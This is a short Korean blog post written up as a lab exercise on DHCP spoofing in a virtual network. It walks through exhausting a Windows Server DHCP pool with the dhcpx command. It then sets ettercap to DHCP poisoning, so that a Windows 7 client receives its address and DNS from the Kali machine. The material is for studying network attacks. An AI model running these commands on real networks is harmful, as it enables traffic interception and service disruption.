Self-Improvement

dhcpx을 이용한 DHCP Spoofing 간단 실습 본문

Kali Linux/Tools 실습

dhcpx을 이용한 DHCP Spoofing 간단 실습

JoGeun 2018. 10. 20. 14:05

*DHCP
DHCP (UDP)

1.Discorver : Client가 Broadcast로 DHCP Server를 찾는다. - 탐색
2.Offer : Server가 Client에게 IP.Addr을 담은 패킷을 Broadcast한다. - 제안
3.Request : Client가 패킷을 받고 받은 IP와 Server의 IP를 Broadcast한다. - 요청
4.Ack : Server는 G/W, DNS 등의 정보를 담아서 Broadcast한다. - 응답


*DHCP의 취약점
UDP로 Broadcast 하며 Client는 가장 먼저 온 패킷을 채택하여 사용하기 때문에 공격자가
자신이 원하는 정보를 담은 패킷을 먼저 보낸다면 Client는 잘못된 정보를 가지게된다.


*DHCP Spoofing
 UDP를 사용함으로 비신뢰성을 이용한 공격

 시나리오 : win7(client)이 win2008(DHCP)에게 DHCP정보를 받아야 하지만 kali에게서 받게 되는 것
 ※VMware의 DHCP서버가 우선순위가 높아서 VMware에서의 DHCP기능을 꺼둬야함

(win2008)
 서버 관리자 -----> 역할 추가 -----> DHCP 역할 설치
 DHCP IP Pool : 192.168.92.30 ~ 192.168.92.40
 NetMask : 255.255.255.0
 DNS Server : 168.126.63.1

(kali)
#dhcpx -v -i eth1 -A -t 10 -D 192.168.92.201 (DHCP서버의 IP대역을 소진하는 시키는 것)

DHCP서버로 부터 IP를 받고 있다.


(win2008)
DHCP IP임대 현황을 확인하면 대역을 모두 소진 하였다.

※MAC address인 고유 ID를 보면 이상하게 되어 있다.

(kali)
#ettercap -G &
 ---------------------설정------------------------------
 Sniff > Unified sniffing > eth1 
 Mitm > dhcp poisoning
 - 192.168.92.40-50
 - 255.255.255.0
 - 8.8.8.8
 Start > start sniffing (시작을함)
 --------------------------------------------------------

 (win7)
 네트워크를 DHCP 서버로부터 IP를 받게 설정을 한다.
 c:>ipconfig /all (확인을 한다.

DHCP 서버의 IP가 kali의 IP로 되어있으며 IP, DNS에 대해 kali로 부터 받은것을 확인 할 수 가있다.